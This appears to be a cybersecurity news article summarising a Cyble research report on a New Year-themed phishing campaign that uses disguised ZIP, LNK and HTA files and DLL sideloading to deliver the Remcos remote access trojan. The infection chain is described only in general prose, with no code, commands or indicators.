As the world joyfully embraced the New Year, malicious actors lurked in the shadows, capitalizing on the celebratory atmosphere to propagate a sophisticated malware campaign. In a recent report by Cyble Research and Intelligence Labs (CRIL), alarming details emerged about a multi-stage malware campaign linked to the notorious Remcos RAT, shedding light on the potential infiltration of systems through cunningly disguised spam emails.
The malicious campaign began with the discovery of a ZIP archive file innocently named “happy new year.zip” on the malware analysis platform VirusTotal. A seemingly harmless attachment unfolded a devious plan, concealing a shortcut file cunningly masquerading as a PNG image. Upon execution, the shortcut file employed MSHTA and JavaScript to initiate a download, presenting the user with a deceptive “Happy New Year” image as a diversionary tactic.
However, the devil was in the details as CRIL’s investigation delved deeper into the intricacies of this cyber threat. The IP address associated with the New Year-themed spam email campaign had a sinister history, being previously linked to the notorious Remcos RAT. Renowned for its remote access and surveillance capabilities, Remcos RAT has become a weapon of choice among threat actors for orchestrating malicious campaigns.
This particular campaign demonstrated a level of sophistication in social engineering, exploiting global trends to deceive victims. Targets received phishing emails seemingly offering information on COVID-19 safety measures or exclusive New Year celebration deals. Cloaked within the seemingly innocent PDF attachments was a cleverly disguised REMCOS RAT dropper, accompanied by a VBS file for malware execution. The malware ensured persistence by adding a Startup registry key, allowing it to remain active even after a system restart.
Once infiltrated, the Remcos RAT exhibited concerning activities, including evading antivirus detection, operating as a legitimate process within Windows processes, acquiring admin privileges, and disabling user account control (UAC). Its capabilities extended to data theft, execution of backdoor commands, and the potential compromise of both system security and user privacy.
The infection chain unfolded with a deceptive lure image in a seemingly harmless spam email, leading to the execution of a multi-stage process involving ZIP, LNK, HTA, and DLL sideloading. Victims were misled into believing they were innocently opening an image file, while a malicious payload was silently downloaded and executed in the background.
Technical analysis conducted by CRIL unveiled the intricacies of the malware’s execution, from the initial ZIP archive to the final connection with the Command and Control (C&C) server. The disguised PNG file, the HTA file, and the subsequent DLL sideloading all played crucial roles in the malware’s stealthy progression.
As we usher in the New Year with celebrations and optimism, the digital realm remains vulnerable to malicious actors exploiting the joyous themes for nefarious deeds. The involvement of Remcos RAT in this New Year-themed malware campaign underscores the evolving nature of dark web markets, particularly in the sale and promotion of malware, trojans, RATs, and Ransomware as a Service (RaaS) products. Cybersecurity vigilance and awareness are paramount as we navigate the digital landscape in 2024.
